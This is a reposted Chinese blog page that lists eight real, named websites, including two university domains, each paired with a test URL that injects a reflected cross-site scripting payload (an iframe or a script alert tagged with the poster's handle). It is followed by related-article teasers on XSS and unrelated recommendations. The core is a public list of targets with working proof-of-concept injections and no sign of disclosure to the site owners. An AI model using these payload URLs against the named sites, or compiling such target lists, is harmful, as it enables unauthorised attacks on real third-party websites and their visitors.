from :http://blog.sina.com.cn/s/blog_68d342d90100nh7b.html

什么是XSS跨站攻击:
http://baike.baidu.com/view/50325.htm
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://sqxhsp.com/news.asp?cat_id=11&types=企业新闻
XSS跨站漏洞测试页面:
http://sqxhsp.com/sever.asp?cat_id=58&types=<iframe src=http://blog.sina.com.cn/aboutshisan width=600 height=400></iframe>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.zyfw365.com/newscontent.aspx?myclass=就业形式&title=就业形势好转 2010年新增就业目标900万人&infoid=435
XSS跨站漏洞测试页面:
http://www.zyfw365.com/newscontent.aspx?myclass=<iframe src=http://blog.sina.com.cn/aboutshisan width=600 heightt=400></iframe>&title=就业形势好转 2010年新增就业目标900万人&infoid=435
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://manage.hncc.edu.cn/more.asp?typeid=16&bigclass=
XSS跨站漏洞测试页面:
http://manage.hncc.edu.cn/more.asp?typeid=16&bigclass=<iframe src=http://blog.sina.com.cn/aboutshisan width=600 heightt=400></iframe>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://jwc.xjmu.edu.cn/_help/Sorry.aspx?str=
XSS跨站漏洞测试页面:
http://jwc.xjmu.edu.cn/_help/Sorry.aspx?str=<script>alert('silic_tank')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://alpas.com/qiye/Product.asp?BigClassName=产品销售
XSS跨站漏洞测试页面:
http://alpas.com/qiye/Product.asp?BigClassName=产品销售<script>alert('silic_tank')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.yangheyuyang.com/error.asp?msg=
XSS跨站漏洞测试页面:
http://www.yangheyuyang.com/error.asp?msg=<script>alert('silic')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.3v.cm/error.asp?errmsg=
XSS跨站漏洞测试页面:
http://www.3v.cm/error.asp?errmsg=<script>alert('yf4n')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.blueidea.com/common/searchbykey.asp?keyword=painter
XSS跨站漏洞测试页面:
http://www.blueidea.com/common/searchbykey.asp?keyword=painter<script>alert('silic')</script>

find xss的更多相关文章

  1. 防御XSS攻击-encode用户输入内容的重要性

    一.开场先科普下XSS 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶 ...

  2. XSS

    XSS的含义 XSS(Cross Site Scripting)即跨站脚本.跨站的主要内容是在脚本上. 跨站脚本 跨站脚本的跨,体现了浏览器的特性,可以跨域.所以也就给远程代码或者第三方域上的代码提供 ...

  3. 【XSS】延长 XSS 生命期

    XSS 的本质仍是一段脚本.和其他文档元素一样,页面关了一切都销毁.除非能将脚本蔓延到页面以外的地方,那样才能获得更长的生命力. 庆幸的是,从 DOM 诞生的那一天起,就已为我们准备了这个特殊的功能, ...

  4. 探索ASP.NET MVC5系列之~~~2.视图篇(上)---包含XSS防御和异步分部视图的处理

    其实任何资料里面的任何知识点都无所谓,都是不重要的,重要的是学习方法,自行摸索的过程(不妥之处欢迎指正) 汇总:http://www.cnblogs.com/dunitian/p/4822808.ht ...

  5. XSS分析及预防

    XSS(Cross Site Scripting),又称跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行.在WEB前端应用日益发展的今天,XSS漏洞尤其容易被开发人员忽视,最终可能造成对个人信息 ...

  6. 个人网站对xss跨站脚本攻击(重点是富文本编辑器情况)和sql注入攻击的防范

    昨天本博客受到了xss跨站脚本注入攻击,3分钟攻陷--其实攻击者进攻的手法很简单,没啥技术含量.只能感叹自己之前竟然完全没防范. 这是数据库里留下的一些记录.最后那人弄了一个无限循环弹出框的脚本,估计 ...

  7. xss和sql注入原理学习

    8.4 Web跨站脚本攻击 8.4.1  跨站脚本攻击的原理(1) 跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS.但是,由于层叠样式表 (Cascading Style ...

  8. XSS 前端防火墙 —— 整装待发

    到目前为止,我们把能用前端脚本防御 XSS 的方案都列举了一遍. 尽管看起来似乎很复杂累赘,不过那些是理论探讨而已,在实际中未必要都实现.我们的目标只是为了预警,能发现问题就行,并非要做到滴水不漏的程 ...

  9. XSS 前端防火墙 —— 天衣无缝的防护

    上一篇讲解了钩子程序的攻防实战,并实现了一套对框架页的监控方案,将防护作用到所有子页面. 到目前为止,我们防护的深度已经差不多,但广度还有所欠缺. 例如,我们的属性钩子只考虑了 setAttribut ...

  10. XSS 前端防火墙 —— 无懈可击的钩子

    昨天尝试了一系列的可疑模块拦截试验,尽管最终的方案还存在着一些兼容性问题,但大体思路已经明确了: 静态模块:使用 MutationObserver 扫描. 动态模块:通过 API 钩子来拦截路径属性. ...

随机推荐

  1. RHEL7和RHEL6即时设置、开启和开机、永久开启服务的方法、原理(例子:端口与Nginx冲突的Apache httpd服务的关闭)

    1.RHEL7 说明:启用服务就是在当前 runlevel 的配置文件目录/etc/systemd/system/multi-user.target.wants/里,建立/usr/lib/system ...

  2. 【修改缓存路径】修改Gradle缓存路径的几种方式

    起因 Android Studio的gradle在缓存处理上有时候会莫名其妙的出问题,必要时需要手动删除缓存,然后重新编译.有时也有出于其他考虑指定gradle缓存路径. 方法1:修改gradle文件 ...

  3. (zhuan) Notes on Representation Learning

    this blog from: https://opendatascience.com/blog/notes-on-representation-learning-1/   Notes on Repr ...

  4. 前端面试题 | JS部分(附带答案)

    目前在找工作,所以各方收集了一堆面试题.其实刷面试题的过程也能更新自己对知识的认识,所以也提醒自己多看多理解.如果对下面题目有更深理解,会实时更新.遇到新题目,也会不定时更新.希望能帮助到部分朋友- ...

  5. Spring依赖

    <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/20 ...

  6. Redux 管理React Native数据

    现在让我们看看大致的流程: React 可以触发 Action,比如按钮点击按钮. Action 是对象,包含一个类型以及相关的数据,通过 Store 的 dispatch() 函数发送到 Store ...

  7. Codeforces Round #271 (Div. 2) E. Pillars 线段树优化dp

    E. Pillars time limit per test 1 second memory limit per test 256 megabytes input standard input out ...

  8. P3146 [USACO16OPEN]248 & P3147 [USACO16OPEN]262144

    注:两道题目题意是一样的,但是数据范围不同,一个为弱化版,另一个为强化版. P3146传送门(弱化版) 思路: 区间动规,设 f [ i ][ j ] 表示在区间 i ~ j 中获得的最大值,与普通区 ...

  9. R语言网页爬虫

    R 是统计计算和数据分析的利器.给定一个数据集,利用前几章介绍到的 R 中灵活的数据结构或高性能计算,我们可以很方便地进行数据转换.建模和数值分析.一般来说,商业数据库会将数据以表格的形式很好地组织起 ...

  10. Qt532.线程(_beginthread)

    1.(20180928)环境:Win7x64.Qt5.3.2 MSVC2010 OpenGL.ms2010 2.测试代码: ZC:我记得 之前在 VC6.vs08 上,还要选择 使用的是哪种 运行时线 ...